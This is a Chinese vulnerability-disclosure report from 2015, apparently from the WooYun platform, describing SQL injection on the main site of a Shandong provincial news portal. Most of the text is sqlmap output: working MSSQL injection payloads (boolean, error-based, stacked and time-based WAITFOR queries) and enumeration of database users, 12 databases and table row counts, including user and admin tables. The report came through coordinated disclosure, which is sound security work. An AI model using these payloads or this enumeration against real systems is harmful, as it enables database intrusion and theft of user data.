漏洞概要
关注数(24)
关注此漏洞
漏洞标题:中国山东网主站多处存在sql注入(可dump21个库/用户信息/大量记录信息泄漏)
提交时间:2015-12-08 00:32
修复时间:2016-01-23 15:16
公开时间:2016-01-23 15:16
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情
披露状态:
2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向核心白帽子及相关领域专家公开
2015-12-31: 细节向普通白帽子公开
2016-01-10: 细节向实习白帽子公开
2016-01-23: 细节向公众公开
简要描述:
21个数据库均可dump,大量的记录信息可泄漏,多个子站用户信息密码也可被泄漏。
详细说明:
网址帮忙打码!~~~
中国山东网(**.**.**.**)是经国务院新闻办公室批准成立的全国重点新闻网站,由山东省人民政府新闻办公室主管、走向世界杂志社主办,新之航传媒集团山东网新传媒有限公司总策划运营,于1996年正式开通。
注入点一:抓包的到的某处接口
注入点二:
ID存在注入,其余类似专题的页面自己排查吧!~~~
<code>
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 22 HTTP(s) requ
ests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=220748 AND 7555=7555&Page=5target=_blank
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ID=220748 AND 8874=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(99)+
CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (8874=8874) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113)))&Page=5target=_blank
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: ID=(SELECT CHAR(113)+CHAR(97)+CHAR(99)+CHAR(103)+CHAR(113)+(SELECT
(CASE WHEN (6663=6663) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHA
R(107)+CHAR(107)+CHAR(113))&Page=5target=_blank
---
[19:26:07] [INFO] testing Microsoft SQL Server
[19:26:07] [INFO] confirming Microsoft SQL Server
[19:26:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[19:26:08] [INFO] fetching current user
[19:26:08] [INFO] retrieved: idollar
current user: 'idollar'
[19:26:08] [INFO] fetching current database
[19:26:09] [INFO] retrieved: SDSW20_News
current database: 'SDSW20_News'
[19:26:09] [INFO] testing if current user is DBA
current user is DBA: False
------------------------------------------------------------
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requ
ests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=228609 AND 3840=3840&Page=6
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ID=228609 AND 8374=CONVERT(INT,(SELECT CHAR(113)+CHAR(108)+CHAR(102
)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (8374=8374) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(119)+CHAR(118)+CHAR(99)+CHAR(113)))&Page=6
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ID=228609; WAITFOR DELAY '0:0:5'--&Page=6
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ID=228609 WAITFOR DELAY '0:0:5'--&Page=6
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: ID=(SELECT CHAR(113)+CHAR(108)+CHAR(102)+CHAR(103)+CHAR(113)+(SELEC
T (CASE WHEN (5568=5568) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+C
HAR(118)+CHAR(99)+CHAR(113))&Page=6
---
[19:59:39] [INFO] testing Microsoft SQL Server
[19:59:39] [INFO] confirming Microsoft SQL Server
[19:59:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[19:59:39] [INFO] fetching current user
[19:59:40] [INFO] retrieved: idollar
current user: 'idollar'
[19:59:40] [INFO] fetching current database
[19:59:40] [INFO] retrieved: SDSW20_News
current database: 'SDSW20_News'
[19:59:40] [INFO] testing if current user is DBA
current user is DBA: False
database management system users [2]:
[*] idollar
[*] sa
available databases [12]:
[*] 91haofang
[*] Man_adv
[*] master
[*] model
[*] msdb
[*] NewsAPP
[*] ReportServer
[*] ReportServerTempDB
[*] SDSW20_Main
[*] SDSW20_News
[*] tempdb
[*] WebFiles
Database: SDSW20_Main
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.TB_SysLog | 103482 |
| dbo.[!FS_News] | 25719 |
| dbo.TU_User | 3734 |
| dbo.TC_Area | 3525 |
| dbo.TE_Agent | 1831 |
| dbo.tb_SiteToFriendLink | 529 |
| dbo.TB_FunCodes | 420 |
| dbo.TB_Columns | 337 |
| dbo.TC_SysFunctions | 240 |
| dbo.TB_FriendLink | 218 |
| dbo.tb_PublishTo | 163 |
| dbo.TU_AdminBBS | 134 |
| dbo.aspnet_UsersInRoles | 131 |
| dbo.vw_aspnet_UsersInRoles | 131 |
| dbo.tab_webchat | 108 |
| dbo.TC_Degree | 99 |
| dbo.TB_ShortCut | 76 |
| dbo.aspnet_Users | 65 |
| dbo.vw_aspnet_Users | 65 |
| dbo.aspnet_Membership | 64 |
| dbo.vw_aspnet_MembershipUsers | 64 |
| dbo.TC_ColumnType | 59 |
| dbo.TU_Admin | 56 |
| dbo.TB_Sites | 29 |
| dbo.TC_Nodes | 26 |
| dbo.TC_SysModules | 26 |
| dbo.aspnet_Roles | 24 |
| dbo.TB_SWRoles | 24 |
| dbo.TC_BulletinPosition | 24 |
| dbo.vw_aspnet_Roles | 24 |
| dbo.[!FS_NewsClass] | 16 |
| dbo.TB_FaceImg | 16 |
| dbo.TB_Config | 9 |
| dbo.TB_FriendLinkToGroup | 9 |
| dbo.TB_Tables | 8 |
| dbo.TB_SiteToGroup | 7 |
| dbo.TB_WorkLog | 7 |
| dbo.TC_DegreeGroup | 7 |
| dbo.TC_UserDegree | 7 |
| dbo.TC_UserEducation | 7 |
| dbo.aspnet_SchemaVersions | 6 |
| dbo.TC_UserRelation | 5 |
| dbo.TC_UserStatus | 5 |
| dbo.TU_Volunteer | 5 |
| dbo.TB_SWRolesSpecialColumn | 4 |
| dbo.TB_Channels | 3 |
| dbo.TB_WorkLog_backup | 3 |
| dbo.tb_SitesToExpertsCatogry | 2 |
| dbo.TU_Expert | 2 |
| dbo.TU_UserSpace | 2 |
| dbo.aspnet_Applications | 1 |
| dbo.TC_AccessChar | 1 |
| dbo.TC_AgentType | 1 |
| dbo.TU_UserAsk | 1 |
| dbo.TU_UserBBS | 1 |
| dbo.TU_UserDigg | 1 |
| dbo.vw_aspnet_Applications | 1 |
+--------------------------------------------------+---------+
Database: SDSW20_News
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.NW_NewsAppend | 3104685 |
| dbo.NW_NewsInfo | 2951443 |
| dbo.vw_NewsInfo | 2892701 |
| dbo.vw_NewsInfo_List | 2892687 |
| dbo.vw_NewsInfoRI | 2892687 |
| dbo.NewsLog | 835816 |
| dbo.Photo_Clicks | 163445 |
| dbo.NW_VotesData | 126723 |
| dbo.gData_News | 109257 |
| dbo.s_OperaLog | 17369 |
| dbo.lh_Reply | 13306 |
| dbo.lh_LivelihoodInfo | 9022 |
| dbo.FS_News | 8147 |
| dbo.NW_SpecialTopic | 7155 |
| dbo.NW_NewsRemarks | 6585 |
| dbo.t_sys_r_GroupMenu | 3495 |
| dbo.t_sys_Menu | 2910 |
| dbo.NW_Sdview | 1855 |
| dbo.vw_SdView | 1844 |
| dbo.vw_SdViewRI | 1844 |
| dbo.TC_NewsCatogry | 1712 |
| dbo.t_sys_r_UserGroup | 1317 |
| dbo.gData_Setting | 1168 |
| dbo.NW_MsInfo | 1020 |
| dbo.TC_NewsCatogry0 | 844 |
| dbo.Photo_Pic
漏洞证明:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-12-11 17:01
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置.
最新状态:
暂无
漏洞评价:
评价
